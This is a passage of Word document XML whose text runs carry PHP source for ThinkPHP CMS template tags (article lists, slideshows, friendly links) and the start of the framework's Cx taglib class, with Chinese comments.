          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46080B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if(\$children_ids){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBA9E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调用全部所有子栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B522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 = think\Db::name('typeid')-&gt;field("id,tid")-&gt;order("id asc")-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A63D4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 = _typeidTid(\$children_ids,\$condition['cid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D7A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\$children_ids_data=[];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695A8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\$children_ids_data[]=$typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167FF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(\$children_ids as \$k =&gt; \$v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46686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\$children_ids_data[]=\$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB469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2F6A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\$where['typeid']=['in',\$children_ids_data];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0FA2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5DA4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调用指定分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F3A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\$where['typeid']=$typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A316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9D44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6947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关键词搜索</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD6D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if("$keywords" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E92B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\$where['title'] =   ['like','%$keywords%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD2B0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BE50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指定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051F11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 ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F126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['in','$id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255B8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A3B7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判断是否有缩略图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD09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if("$image" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6781F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if('$image'=='image'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F200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 =   ['neq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B746E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if('$image'=='imageNo'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBC8A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 =   ['eq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381996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BB3B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F693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8428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\$list = think\Db::name('article')-&gt;where(\$where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18016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调用自定义属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08467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if("$field" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1166AA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\$list=\$list-&gt;field("$field");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA24D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8CF5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文章排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB7A3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if("$order" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19142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if("$order" == 'click'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363EC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\$list=\$list-&gt;order("click desc,des desc,id desc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212CD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050A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\$list=\$list-&gt;order("$order");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C80F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F61F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711C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\$list=\$list-&gt;order("des desc,id desc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2A40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F501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时间表达式</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C440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if("$time" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AD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\$list=\$list-&gt;whereTime('create_time','$time');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B34E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C64C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分页与数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095E5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 !=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0374BD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if($pagesize==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786FB1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FF23B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\$list=\$list-&gt;paginate($pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE47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BADD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\$list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD5B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9F22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数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E93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if("$limit" != 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4B8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\$list=\$list-&gt;limit($limit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F35DF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BD5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\$list=\$list-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A94FD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CAD9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开始赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71123E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\$list;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F3A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 =&gt; \${$v}):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14564C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if(!\${$v}['url']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBBE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\${$v}['url'] = url("article/view",["id"=&gt;\${$v}["id"]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC7C0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3C3A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1693E2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425B76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49EBA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endforeach;?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704A0E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641954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C3F7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0DCC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轮播图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6377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EEEE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tagSlide($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663EF7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9EC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$id = isset($tag['id']) ? $tag['id'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFCC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$tid = isset($tag['tid']) ? $tag['tid'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC54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 = isset($tag['field']) ? $tag['field'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0488F2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isset($tag['order']) ? $tag['order'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CE8B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isset($tag['limit']) ? $tag['limit'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DAE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$pagesize = isset($tag['pagesize']) ? $tag['pagesize'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33156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5634E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C74B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unset(\$where); /*unset</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>销毁代码，处理怪异问题，待研究</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A8CD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74DEF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指定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>轮播图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E133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 ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8063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['in','$id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F54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FA20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指定分组</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个指定分组填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>逗号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECF94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if("$tid" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7DD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\$where['tid'] =   $tid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724517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992D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think\Db::name('slide')-&gt;where(\$where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126692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排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040E33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if("$order" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD8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\$list=\$list-&gt;order("$order");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606171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54224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\$list=\$list-&gt;order("des desc,id desc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257E24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52D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调用自定义属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B69F7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if("$field" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A5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\$list=\$list-&gt;field("$field");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D650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C54F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分页与数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A91BE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 !=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343CE2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if($pagesize==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED145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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5D0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46C6A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\$list=\$list-&gt;paginate($pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33DF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0C66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\$list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D637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2140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数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A51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if("$limit" != 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498634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\$list=\$list-&gt;limit($limit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9CB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E76E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\$list=\$list-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638EE4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D29F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开始赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4499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\$__LIST__ = \$list;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2B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 =&gt; \$fx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734B5A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2CD56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120516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683E4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endforeach;?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B0C5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$parse;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A2AD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E17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9CA5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友情链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378D0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3FA4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tagLink($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9BB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5E51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isset($tag['id']) ? $tag['id'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F6D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isset($tag['order']) ? $tag['order'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605EB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isset($tag['limit']) ? $tag['limit'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3527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$pagesize = isset($tag['pagesize']) ? $tag['pagesize'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3CA4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isset($tag['img']) ? $tag['img'] : "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3773F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&lt;&lt;&lt;EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F44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unset(\$where); /*unset</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>销毁代码，处理怪异问题，待研究</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11315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2E2ED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指定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563AD3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 ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D230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['in','$id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9D35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16F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判断是否有缩略图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047842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 != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA41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if('$img'=='img'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629E9E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\$where['img'] =   ['neq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2D52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if('$img'=='imageNo'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B7BC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\$where['img'] =   ['eq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED8C6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4A4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E2F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think\Db::name('link')-&gt;where(\$where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD8F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排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D455D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if("$order" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59281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\$list=\$list-&gt;order("$order");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F63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E61D9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\$list=\$list-&gt;order("des desc,id desc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD877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5D9D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分页与数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E14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 !=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59127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if($pagesize==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345EFB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEEA9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0DA75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\$list=\$list-&gt;paginate($pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DACA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845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\$list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421D54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A4215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数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434D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if("$limit" != 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A350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\$list=\$list-&gt;limit($limit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3052CD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8F3E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\$list=\$list-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594AB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7755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开始赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5707B9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\$__LIST__ = \$list;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6190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foreach(\$__LIST__ as \$k =&gt; \$fx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF6E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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4B24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EOF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BC89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$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F0B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 .= '&lt;?php endforeach;?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531663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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF3B2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0C83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7130B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think\template\taglib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B01F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think\template\TagLib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2EE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44090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CX</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签库解析类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD0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@category   Think</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D93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@package  Think</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23F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@subpackage  Driver.Taglib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3991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@author    liu21st &lt;liu21st@gmail.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D30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84F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Cx extends Taglib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB96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553EC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$tags = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB393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'php'        =&gt; ['attr' =&gt; ''],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072AFF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'volist'     =&gt; ['attr' =&gt; 'name,id,offset,length,key,mod', 'alias' =&gt; 'iterate'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A83C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=&gt; ['attr' =&gt; 'name,id,item,key,offset,length,mod', 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C195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=&gt; ['attr' =&gt; 'condition', 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FD44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'elseif'     =&gt; ['attr' =&gt; 'condition', 'close' =&gt; 0, 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06370B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=&gt; ['attr' =&gt; '', 'close' =&gt; 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD6B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=&gt; ['attr' =&gt; 'name', 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA7C2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=&gt; ['attr' =&gt; 'value,break', 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEC0A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    =&gt; ['attr' =&gt; '', 'close' =&gt; 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634B81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'compare'    =&gt; ['attr' =&gt; 'name,value,type', 'alias' =&gt; ['eq,equal,notequal,neq,gt,lt,egt,elt,heq,nheq', 'type']],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A1A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'range'      =&gt; ['attr' =&gt; 'name,value,type', 'alias' =&gt; ['in,notin,between,notbetween', 'type']],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE09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'empty'      =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2E4E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'notempty'   =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A96C3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'present'    =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D1F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'notpresent' =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B939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'defined'    =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEAC9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'notdefined' =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43301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'load'       =&gt; ['attr' =&gt; 'file,href,type,value,basepath', 'close' =&gt; 0, 'alias' =&gt; ['import,css,js', 'type']],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266EA0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'assign'     =&gt; ['attr' =&gt; 'name,value', 'close' =&gt; 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D203A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'define'     =&gt; ['attr' =&gt; 'name,value', 'close' =&gt; 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587126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        =&gt; ['attr' =&gt; 'start,end,name,comparison,step'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D55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=&gt; ['attr' =&gt; 'link,vars,suffix,domain', 'close' =&gt; 0, 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBEFA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'function'   =&gt; ['attr' =&gt; 'name,vars,use,call'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E5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2234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5078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php</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2829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p>
    <w:p w14:paraId="31BE16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{php}echo $name{/php}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6476D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@access public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36A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744B8E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11A49A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72C37B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74AE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tagPhp($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276860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5BCE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 . $content . ' ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB99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752FC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676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EF3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volist</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>循环输出数据集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369C01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p>
    <w:p w14:paraId="19E4E7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{volist name="userList" id="user" empty=""}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9595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{user.username}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E923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{user.email}</w:t>
